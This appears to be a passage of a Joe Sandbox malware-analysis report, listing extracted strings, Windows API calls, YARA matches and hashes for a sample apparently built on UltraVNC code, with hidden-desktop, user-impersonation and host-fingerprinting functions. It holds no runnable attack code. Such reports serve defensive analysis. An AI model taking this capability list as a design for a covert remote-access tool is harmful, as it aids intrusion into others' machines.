                                                                    • HideDesktop.cpp : Retrieved SPI value for SPI_GETFONTSMOOTHINGTYPE: 0x%08x, xrefs: 00007FF6DC0CA9E6
                                                                    • HideDesktop.cpp : Failed to get SPI value for SPI_GETCLEARTYPE (0x%08x), xrefs: 00007FF6DC0CAA26
                                                                    • HideDesktop.cpp : Set SPI value for SPI_SETCLEARTYPE: 0x%08x, xrefs: 00007FF6DC0CAAE1
                                                                    • HideDesktop.cpp : Failed to get SPI value for SPI_GETFONTSMOOTHING (0x%08x), xrefs: 00007FF6DC0CA94D
                                                                    • HideDesktop.cpp : Set SPI value for SPI_SETFONTSMOOTHING: 0x%08x, xrefs: 00007FF6DC0CAB3F
                                                                    • HideDesktop.cpp : Retrieved SPI value for SPI_GETCLEARTYPE: 0x%08x, xrefs: 00007FF6DC0CAA4D
                                                                    • HideDesktop.cpp : Failed to set SPI value for SPI_SETCLEARTYPE (0x%08x), xrefs: 00007FF6DC0CAAC1
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ErrorInfoLastParametersSystem
                                                                    • String ID: HideDesktop.cpp : Failed to get SPI value for SPI_GETCLEARTYPE (0x%08x)$HideDesktop.cpp : Failed to get SPI value for SPI_GETFONTSMOOTHING (0x%08x)$HideDesktop.cpp : Failed to get SPI value for SPI_GETFONTSMOOTHINGTYPE (0x%08x)$HideDesktop.cpp : Failed to set SPI value for SPI_SETCLEARTYPE (0x%08x)$HideDesktop.cpp : Failed to set SPI value for SPI_SETFONTSMOOTHING (0x%08x)$HideDesktop.cpp : Retrieved SPI value for SPI_GETCLEARTYPE: 0x%08x$HideDesktop.cpp : Retrieved SPI value for SPI_GETFONTSMOOTHING: 0x%08x$HideDesktop.cpp : Retrieved SPI value for SPI_GETFONTSMOOTHINGTYPE: 0x%08x$HideDesktop.cpp : Set SPI value for SPI_SETCLEARTYPE: 0x%08x$HideDesktop.cpp : Set SPI value for SPI_SETFONTSMOOTHING: 0x%08x
                                                                    APIs
                                                                    Strings
                                                                    • vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - ImpersonateLoggedOnUser Failed, xrefs: 00007FF6DC0EC455
                                                                    • vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - Call, xrefs: 00007FF6DC0EC2F4
                                                                    • vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - OpenProcessToken Error, xrefs: 00007FF6DC0EC43D
                                                                    • vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - currentUser = %s, xrefs: 00007FF6DC0EC3DC
                                                                    • g, xrefs: 00007FF6DC0EC31B
                                                                    • vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - 1, xrefs: 00007FF6DC0EC37E
                                                                    • vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - WSLocked, xrefs: 00007FF6DC0EC3A7
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CriticalSection$Leave$Enter
                                                                    • String ID: g$vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - 1$vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - Call$vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - ImpersonateLoggedOnUser Failed$vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - OpenProcessToken Error$vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - WSLocked$vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - currentUser = %s
                                                                    APIs
                                                                    Strings
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: DeleteObjectRectfree$CombineCreateCriticalEventSection$EnterErrorFreeHeapLastLeave_errnomalloc
                                                                    • String ID: \$vncclient.cpp : FATAL! client update region is empty!
                                                                    APIs
                                                                    Strings
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: sprintf$NameUser_errno_invalid_parameter_noinfo
                                                                    • String ID: ComputerName : $IP : $ Build:%d$ Service Pack: 6a$ v%d.$%02d$, (MSIL Processor)$Current user :
                                                                    APIs
                                                                    Strings
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: sprintf$NameUser_errno_invalid_parameter_noinfo
                                                                    • String ID: ComputerName : $IP : $ Build:%d$ Service Pack: 6a$ v%d.$%02d$, (MIPS Processor)$Current user :
                                                                    APIs
                                                                    Strings
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: sprintf$NameUser_errno_invalid_parameter_noinfo
                                                                    • String ID: ComputerName : $IP : $ Build:%d$ Service Pack: 6a$ v%d.$%02d$, (Alpha64 Processor)$Current user :
                                                                    APIs
                                                                    Strings
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: sprintf$NameUser_errno_invalid_parameter_noinfo
                                                                    • String ID: ComputerName : $IP : $ Build:%d$ Service Pack: 6a$ v%d.$%02d$, (Intel Processor)$Current user :
                                                                    APIs
                                                                    Strings
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: sprintf$NameUser_errno_invalid_parameter_noinfo
                                                                    • String ID: ComputerName : $IP : $ Build:%d$ Service Pack: 6a$ v%d.$%02d$, (ARM Processor)$Current user :
                                                                    • API String ID: 171970310-978419383
                                                                    • Opcode ID: a8d8f491f9732d8cee92c56ad349269dc42da93c27ec5ad26cc636e7eff597dc
                                                                    • Instruction ID: 3411c13b4bd163122319c600e821b01748e27f1dc26100f71f648e845009ec37
                                                                    • Opcode Fuzzy Hash: a8d8f491f9732d8cee92c56ad349269dc42da93c27ec5ad26cc636e7eff597dc
                                                                    • Instruction Fuzzy Hash: A5B1A321A0869A85EB608B3999406BD37A0FB447B0F504337E67EC7AD5DF2DE527C710
                                                                    APIs
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: sprintf$NameUser_errno_invalid_parameter_noinfo
                                                                    • String ID: ComputerName : $IP : $ Build:%d$ Service Pack: 6a$ v%d.$%02d$, (SHX Processor)$Current user :
                                                                    • API String ID: 171970310-3227166451
                                                                    • Opcode ID: f87aec30509e434426b08c2f6c773820ec2921cd93d1ed894a2fb9928649058d
                                                                    • Instruction ID: e1784e62eddb4535d1989f580fe237d0bae2d508b9c5985f76f166560ec6413d
                                                                    • Opcode Fuzzy Hash: f87aec30509e434426b08c2f6c773820ec2921cd93d1ed894a2fb9928649058d
                                                                    • Instruction Fuzzy Hash: 91B1A221A0869A85EB608B3899406BD37A0FB447B0F444337E67EC7AD5DF2DE527C710
                                                                    APIs
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: sprintf$NameUser_errno_invalid_parameter_noinfo
                                                                    • String ID: ComputerName : $IP : $ Build:%d$ Service Pack: 6a$ v%d.$%02d$, (Alpha Processor)$Current user :
                                                                    • API String ID: 171970310-733379141
                                                                    • Opcode ID: fb41818708b430e62bf73831d052d0c4d926f05be827444239f89a711e28a3fb
                                                                    • Instruction ID: 637a6f385114504dcc45a1be35fd80ef66316743ab2c5041ec52e5b1807af8bb
                                                                    • Opcode Fuzzy Hash: fb41818708b430e62bf73831d052d0c4d926f05be827444239f89a711e28a3fb
                                                                    • Instruction Fuzzy Hash: CEB19221A0869A85EB608B3899406BD37A0FB447B0F504337E67EC7AD5DF2DE527C710
                                                                    APIs
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: Desktop$MessageThread$CloseCurrentDispatchInformationInputObjectOpenTranslateUser
                                                                    • String ID: black_layered.cpp : !GetUserObjectInformation $black_layered.cpp : OpenInputdesktop Error $black_layered.cpp : OpenInputdesktop OK$black_layered.cpp : SelectHDESK to %s (%x) from %x$black_layered.cpp : SelectHDESK:!SetThreadDesktop $black_layered.cpp : end BlackWindow
                                                                    • API String ID: 2763862709-1375279643
                                                                    • Opcode ID: 97dc65336ba64628ca373ffe4e0f0f58b485fa95820c520cbe5a523dd1110f8f
                                                                    • Instruction ID: f617a9efc4c4fd94563de36d2ca923cda2774ef8714830f82eff5d598a4d6908
                                                                    • Opcode Fuzzy Hash: 97dc65336ba64628ca373ffe4e0f0f58b485fa95820c520cbe5a523dd1110f8f
                                                                    • Instruction Fuzzy Hash: 39416820A28A9B91FA10DF65BC546FE23A8BF88744F844037D91EC2564DF3DE12B8700
                                                                    APIs
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: Library$AddressFreeLoadProc$Sleep$DebugErrorLastOutputStringsprintf
                                                                    • String ID: LockWorkStation$LockWorkstation failed with error 0x%0X$WinStationConnectW$user32.dll$winsta.dll
                                                                    • API String ID: 2931780912-670137772
                                                                    • Opcode ID: 4c941a38a0d861067d34bbbc45676cf3eae1c23976c0e3f2b532e901046bab96
                                                                    • Instruction ID: 4b46802ccbe3449a5f33196b90e08e26ea426ed6ba29d4eabd4cb3ea202f456c
                                                                    • Opcode Fuzzy Hash: 4c941a38a0d861067d34bbbc45676cf3eae1c23976c0e3f2b532e901046bab96
                                                                    • Instruction Fuzzy Hash: 29317E25A18A5A81FA259F21F8542BD63A8FF84B84F450133DD1EC3A54DF3CEA27CB40
                                                                    APIs
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: CloseHandleProcess$OpenWindow$CreateErrorFileFindLastModuleNameThreadTokenUser
                                                                    • String ID: -settingshelper$Shell_TrayWnd$Winsta0\Default
                                                                    • API String ID: 421869683-3362258117
                                                                    • Opcode ID: 3590b074e5f29d85f71debabe8de06fed850c3c5fd9db8f8af18c013e671a393
                                                                    • Instruction ID: f7108221b8c14ddfc1c5b4a45671380a04213e0ac20bb51ecb09ff34ac1756ca
                                                                    • Opcode Fuzzy Hash: 3590b074e5f29d85f71debabe8de06fed850c3c5fd9db8f8af18c013e671a393
                                                                    • Instruction Fuzzy Hash: 2B516131A08B9585EB148F21E8446AD77A8FB89754F044236EAAD83A94DF3CE527CB40
                                                                    APIs
                                                                    Strings
                                                                    • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable called, xrefs: 00007FF6DC0D695B
                                                                    • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using video Palette, xrefs: 00007FF6DC0D69F2
                                                                    • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : got %u palette entries, xrefs: 00007FF6DC0D6A39
                                                                    • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable done, xrefs: 00007FF6DC0D6BB2
                                                                    • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : failed to allocate translation table, xrefs: 00007FF6DC0D69A4
                                                                    • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using mirror video Palette, xrefs: 00007FF6DC0D6A0B
                                                                    Similarity
                                                                    • API ID: ErrorFreeLastLibrary$AddressDeleteDisplayEntriesEnumHeapLoadPaletteProcReleaseSettingsSystem_errnofreemalloc
                                                                    • String ID: l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using mirror video Palette$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using video Palette$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : failed to allocate translation table$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : got %u palette entries$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable called$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable done
                                                                    • API String ID: 181403729-1081969236
                                                                    • Opcode ID: 356ec768b8f7f08761f25f9f6f5bd7aee8d03a8140df0f5e6c97a1197c639f56
                                                                    • Instruction ID: 4431e8fed7dd49b2493eef1f3c9f051761b9422d61814df000c364fe0efc0912
                                                                    • Opcode Fuzzy Hash: 356ec768b8f7f08761f25f9f6f5bd7aee8d03a8140df0f5e6c97a1197c639f56
                                                                    • Instruction Fuzzy Hash: 1E614A62A185EA81FB289B69D8153FD3394EB85344F44453BE98EC7A91DF3DE12BC700
                                                                    APIs
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: rand$Time_getptd$FileSystem
                                                                    • String ID: After DH: g=%I64u, m=%I64u, i=%I64u, key=%I64u$CheckUserGroupPasswordUni result=%i$interKey larger than maxNum
                                                                    • API String ID: 3485648590-3000200491
                                                                    • Opcode ID: 9c4f8f5f3383368a3c5f550ecdcbc58bdc651eaed619b1525faa9b043efa2584
                                                                    • Instruction ID: 2f0e86c9203ae625ef302b9ad626edbae76014c9982333688f50610ee7e0d802
                                                                    • Opcode Fuzzy Hash: 9c4f8f5f3383368a3c5f550ecdcbc58bdc651eaed619b1525faa9b043efa2584
                                                                    • Instruction Fuzzy Hash: 37F13952B193E94AEB11C7BAA8101FC7FA49B82789F544037DF9D9BB86DE2CD112C710
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Similarity
                                                                    • API ID: ImageLoadModule$BitsCreateDeleteFileHandleName
                                                                    • String ID: ($DISPLAY$\background.bmp
                                                                    • API String ID: 3125945695-1422902838
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: recv$send
                                                                    • String ID: CONNECT %s:%d HTTP/1.0$Location: $Proxy-Authenticate:$WWW-Authenticate:$basic
                                                                    • API String ID: 1963230611-4083095726
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: Library$AddressCreateDisplayEnumFreeLoadProcSettings
                                                                    • String ID: DISPLAY$EnumDisplayDevicesA$USER32$mv video hook driver2
                                                                    • API String ID: 3702840025-1174184736
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: PrivateProfile$CloseFileModuleNameOpenQueryValue
                                                                    • String ID: NewMSLogon$Software\ORL\WinVNC3$UseRegistry$admin
                                                                    • API String ID: 771632046-3493897170
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: Process$CloseHandleOpenToken$AdjustCurrentErrorLastLookupPrivilegePrivilegesValue
                                                                    • String ID: SeTcbPrivilege
                                                                    • API String ID: 2450735924-1502394177
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: _errno$_get_daylight_invalid_parameter_noinfo$ByteCharMultiWidefree$ErrorFreeHeapInformationLastTimeZone___lc_codepage_func__wtomb_environ_amsg_exit_getptd_lock
                                                                    • String ID:
                                                                    • API String ID: 2532449802-0
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: _get_daylight$_errno_isindst$__getgmtimebuf__tzset_invalid_parameter_noinfo
                                                                    • String ID:
                                                                    • API String ID: 1457502553-0
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: AddressInfoProcSystem$Version
                                                                    • String ID: @$GetNativeSystemInfo$GetVersionExA
                                                                    • API String ID: 4103462327-1183986914
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: DesktopOpen$ClipboardCloseInput
                                                                    • String ID: vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
                                                                    • API String ID: 2872304593-3977938048
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: PrivateProfileQueryValue$FileModuleNameString
                                                                    • String ID: UseRegistry$admin$admin_auth
                                                                    • API String ID: 3374479654-3376419731
                                                                    • Opcode ID: f1da5f48a8e78eea85e5e4b18c7d496972abace380fcf9454b174fc3425995f0
                                                                    • Instruction ID: 780a75a0d08170fbafa734007bf6153be76150310b5866576a941f0be7807892
                                                                    • Opcode Fuzzy Hash: f1da5f48a8e78eea85e5e4b18c7d496972abace380fcf9454b174fc3425995f0
                                                                    • Instruction Fuzzy Hash: 1E31723261CA5A81EB618B11EC447AEB3A8FB99794F441137EA8D83B94DF3CD516CB40
                                                                    APIs
                                                                    Strings
                                                                    • i, xrefs: 00007FF6DC0E1809
                                                                    • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\vncpasswd.h : PASSWD : ToText called, xrefs: 00007FF6DC0E166F
                                                                    • unable to determine legacy authentication method, xrefs: 00007FF6DC0E173F
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CriticalSection_errnofreemalloc$AllocCurrentEnterHeapLeaveProcess_callnewhrand
                                                                    • String ID: i$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\vncpasswd.h : PASSWD : ToText called$unable to determine legacy authentication method
                                                                    • API String ID: 2847437661-1576074771
                                                                    • Opcode ID: 4c04c3d75062cb184de61391ac266afc18fbb013ad7d6cff4a4c70e5b1d16c34
                                                                    • Instruction ID: a8dc64112fb05c52f9f47caa13e83a834e1747888010fff0c49d3c01e7a03dc1
                                                                    • Opcode Fuzzy Hash: 4c04c3d75062cb184de61391ac266afc18fbb013ad7d6cff4a4c70e5b1d16c34
                                                                    • Instruction Fuzzy Hash: B9D1AD32B4865685FB14CB65D8443BC27AAEB84764F184236DA6ED7AD6CF39E853C300
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Create$FileModuleNamePrivateProfile
                                                                    • String ID: Software\UltraVNC$UseRegistry$admin$mslogon
                                                                    • API String ID: 27673491-2056936749
                                                                    • Opcode ID: 49ca59dd5d1ce4bd8261c69328d6c9401fd879975b581b5eca3f4e4a4bfb3057
                                                                    • Instruction ID: ccb2c7b962ee55afe94dae962d88dd163076bdd615e3e6d2491e95e9211d7a0d
                                                                    • Opcode Fuzzy Hash: 49ca59dd5d1ce4bd8261c69328d6c9401fd879975b581b5eca3f4e4a4bfb3057
                                                                    • Instruction Fuzzy Hash: 7121443291CB5A92E7608F10F8917AEB368FB98354F801136E69D83B54DF7DD12ACB40
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ProcessToken$AdjustCurrentExitLookupOpenPrivilegePrivilegesValueVersionWindows
                                                                    • String ID: SeShutdownPrivilege
                                                                    • API String ID: 337752880-3733053543
                                                                    • Opcode ID: ccb4f6b8adec0e5263e9b53491d22d093fe75a13b47b81360652c4a9f3302a15
                                                                    • Instruction ID: ce09386953cde39f3e8e9e00fcfdb3e6df69c6fa1454c733777afc1720a70001
                                                                    • Opcode Fuzzy Hash: ccb4f6b8adec0e5263e9b53491d22d093fe75a13b47b81360652c4a9f3302a15
                                                                    • Instruction Fuzzy Hash: 77116371A1874685E750DB20F8597AEB3A4FF84744F804036E59E86A54DF7DD16BCB00
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Window$RectVisible$Foreground
                                                                    • String ID:
                                                                    • API String ID: 2499709836-0
                                                                    • Opcode ID: 48f1e47169105f78f1c5671409c72268c28db6c5ed06a4c25a4347c71102ace5
                                                                    • Instruction ID: cac2d5df6b2154522390b5cf568a5dd405bfe7ed54cbbcc9ae6d55d548a44e17
                                                                    • Opcode Fuzzy Hash: 48f1e47169105f78f1c5671409c72268c28db6c5ed06a4c25a4347c71102ace5
                                                                    • Instruction Fuzzy Hash: 11D16F32B186958EEB14CFB9D4406EC37B6F788B48B10513ADE0DA7B88DF3594A6C744
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmp
